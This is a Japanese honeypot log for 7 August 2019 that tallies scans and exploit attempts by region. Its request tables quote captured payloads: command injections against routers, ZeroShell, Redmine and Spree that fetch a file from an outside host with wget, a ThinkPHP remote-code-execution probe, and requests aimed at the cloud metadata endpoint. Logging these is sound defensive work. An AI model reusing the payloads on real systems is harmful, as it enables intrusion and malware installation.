ハニーポット(仮) 観測記録 2019/08/07分です。

まとめ

Region：AP

ThinkPHPの脆弱性を狙うアクセス
Jira(CVE-2019–11581)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Jorgeeでのスキャン行為
ZmEuでのスキャン行為
112[.]124[.]42[.]80に関する不正通信
を確認しました。
UserAgentがAWS Security Scannerの通信を確認しました。

Region：US

Asus RT56Uルータ(CVE-2013-5948)の脆弱性を狙うアクセス
Jira(CVE-2019–11581)の脆弱性を狙うアクセス
Redmine SCM Repositoryの脆弱性を狙うアクセス
Spree Commerce(OSS eコマースソフト)の脆弱性を狙うアクセス
ZeroShell/Linix(CVE-2009-0545)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuでのスキャン行為
112[.]124[.]42[.]80に関する不正通信
123[.]125[.]114[.]144に関する不正通信
を確認しました。

Region：EU

Jira(CVE-2019–11581)の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuでのスキャン行為
3[.]9[.]135[.]182に関する不正通信
112[.]124[.]42[.]80に関する不正通信
を確認しました。
UserAgentがAWS Security Scannerの通信を確認しました。

他

AWS環境へのスキャンが実施されている可能性があります。

アクセス数推移

AP：総アクセス数：143 (前日比：+18)
US：総アクセス数：28 (前日比：+8)
EU：総アクセス数：40 (前日比：-3)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
4	113.125.44.65	China
2	114.115.181.47	China
1	123.57.242.94	China
2	128.14.133.58	United States
1	157.55.39.37	United States
1	165.22.28.110	United States
1	169.197.108.6	Netherlands
10	175.182.75.161	Taiwan
2	182.16.103.93	Hong Kong
6	195.154.86.34	France
1	198.108.67.112	United States
9	198.177.123.196	United States
5	2.224.132.78	Italy
1	39.106.227.80	China
2	45.252.248.236	Vietnam
2	5.188.210.101	Russia
20	52.25.147.204	United States
1	52.35.37.229	United States
3	54.255.201.28	Singapore
38	60.12.172.21	China
3	60.191.52.254	China
1	64.121.155.96	United States
9	69.255.234.170	United States
4	71.6.146.185	United States
9	80.195.148.174	United Kingdom
4	82.221.105.6	Iceland
1	89.248.174.52	Netherlands

UserAgent一覧

件数	UserAgent
14	-
15	AWS Security Scanner
1	Go-http-client/1.1
1	Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
4	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
33	Mozilla/5.0 Jorgee
3	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
3	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
15	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
1	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
2	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	python-requests/2.10.0
1	python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2
42	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
3	GET	/db/	HTTP/1.1
2	GET	/echo.php	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
2	GET	HTTP/1.1
1	GET	http://169[.]254[.]169[.]254/	HTTP/1.1
1	GET	http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	http://example.com/	HTTP/1.1
1	GET	http://[::ffff[:]a9fe[:]a9fe]/	HTTP/1.1
1	GET	http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
10	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
4	GET	/manager/html	HTTP/1.1
6	GET	/myadmin/scripts/setup.php	HTTP/1.1
6	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
3	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
3	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
3	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
3	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/ncsi.txt	HTTP/1.1
6	GET	/phpmyadmin/	HTTP/1.1
3	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
8	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
6	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
3	GET	/pma/	HTTP/1.1
3	GET	/PMA/	HTTP/1.1
8	GET	/pma/scripts/setup.php	HTTP/1.1
3	GET	/robots.txt	HTTP/1.1
3	GET	/secure/ContactAdministrators!default.jspa	HTTP/1.1
2	GET	/sitemap.xml	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
3	GET	/TP/public/index.php	HTTP/1.1
8	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
2	GET	/.well-known/security.txt	HTTP/1.1
3	HEAD	/dbadmin/	HTTP/1.1
3	HEAD	/db/	HTTP/1.1
3	HEAD	/	HTTP/1.1
1	HEAD	http://112[.]124[.]42[.]80:63435/	HTTP/1.1
1	HEAD	/images/	HTTP/1.1
6	HEAD	/phpmyadmin/	HTTP/1.1
3	HEAD	/pma/	HTTP/1.1
3	HEAD	/PMA/	HTTP/1.1
1	POST	/TP/index.php?s=captcha	HTTP/1.1
6	\x16\x03\x01

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	111.224.249.151	China
1	123.145.17.95	China
1	123.158.48.119	China
1	124.235.138.168	China
1	124.235.138.41	China
1	124.235.138.62	China
1	169.197.108.38	Netherlands
1	182.200.7.114	China
3	195.154.86.34	France
1	198.108.67.112	United States
1	213.128.88.99	Turkey
1	218.58.38.222	China
1	27.224.137.60	China
2	46.105.234.11	France
2	47.95.224.246	China
1	52.35.37.229	United States
2	5.39.37.10	France
1	54.255.201.28	Singapore
1	54.39.209.227	Canada
1	58.248.202.31	China
1	60.191.52.254	China
1	60.208.165.146	China
1	89.248.174.52	Netherlands

UserAgent一覧

件数	UserAgent
7	-
1	Mozilla/5.0
1	Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36
3	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
7	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
3	PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1	python-requests/2.7.0 CPython/2.7.14 Windows/2012ServerR2
3	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1	CONNECT	cn[.]bing[.]com:443	HTTP/1.1
1	CONNECT	www[.]baidu[.]com:443	HTTP/1.1
1	CONNECT	www[.]voanews[.]com:443	HTTP/1.1
1	GET	/apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192[.]168[.]1[.]1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185[.]164[.]72[.]155/richard;
1	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185[.]164[.]72[.]155/richard;
1	GET	http://boxun.com/	HTTP/1.1
1	GET	http://www[.]123cha[.]com/	HTTP/1.1
1	GET	http://www[.]epochtimes[.]com/	HTTP/1.1
1	GET	http://www[.]ip[.]cn/	HTTP/1.1
1	GET	http://www[.]minghui[.]org/	HTTP/1.1
1	GET	http://www[.]rfa[.]org/english/	HTTP/1.1
1	GET	http://www[.]wujieliulan[.]com/	HTTP/1.1
3	GET	/manager/html	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/repository/annotate?rev=wget http://185[.]164[.]72[.]155/richard;
1	GET	/?search[send]=eval&search[send][]=Kernel.fork%20do%60wget http://185[.]164[.]72[.]155/richard;
1	GET	/secure/ContactAdministrators!default.jspa	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/webdav/	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	HEAD	http://112[.]124[.]42[.]80:63435/	HTTP/1.1
1	HEAD	http://123[.]125[.]114[.]144/	HTTP/1.1
1	POST	/cgi-bin/;wget http://185[.]164[.]72[.]155/richard;
1	PROPFIND	/	HTTP/1.1
1	\x16\x03\x01

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	128.14.133.58	United States
3	195.154.86.34	France
1	213.128.88.99	Turkey
17	52.25.147.204	United States
1	54.255.201.28	Singapore
1	60.191.52.254	China
16	79.11.97.105	Italy

UserAgent一覧

件数	UserAgent
10	-
7	AWS Security Scanner
2	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
16	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
3	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
5	CONNECT	3[.]9[.]135[.]182:80	HTTP/1.0
1	GET	/2phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	http://169[.]254[.]169[.]254/	HTTP/1.1
1	GET	http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document	HTTP/1.1
1	GET	http://example.com/	HTTP/1.1
1	GET	http://[::ffff[:]a9fe[:]a9fe]/	HTTP/1.1
1	GET	http://[::ffff[:]a9fe[:]a9fe]/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	/latest/dynamic/instance-identity/document	HTTP/1.1
2	GET	/manager/html	HTTP/1.1
1	GET	/myadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/admin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/dbadmin/index.php?lang=en	HTTP/1.1
1	GET	/mysql/mysqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/mysql/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin3/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin4/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyadmin/index.php?lang=en	HTTP/1.1
1	GET	/phpMyAdmin/index.php?lang=en	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmy/index.php?lang=en	HTTP/1.1
1	GET	/phppma/index.php?lang=en	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/secure/ContactAdministrators!default.jspa	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
1	HEAD	http://112[.]124[.]42[.]80:63435/	HTTP/1.1
5	\x16\x03\x01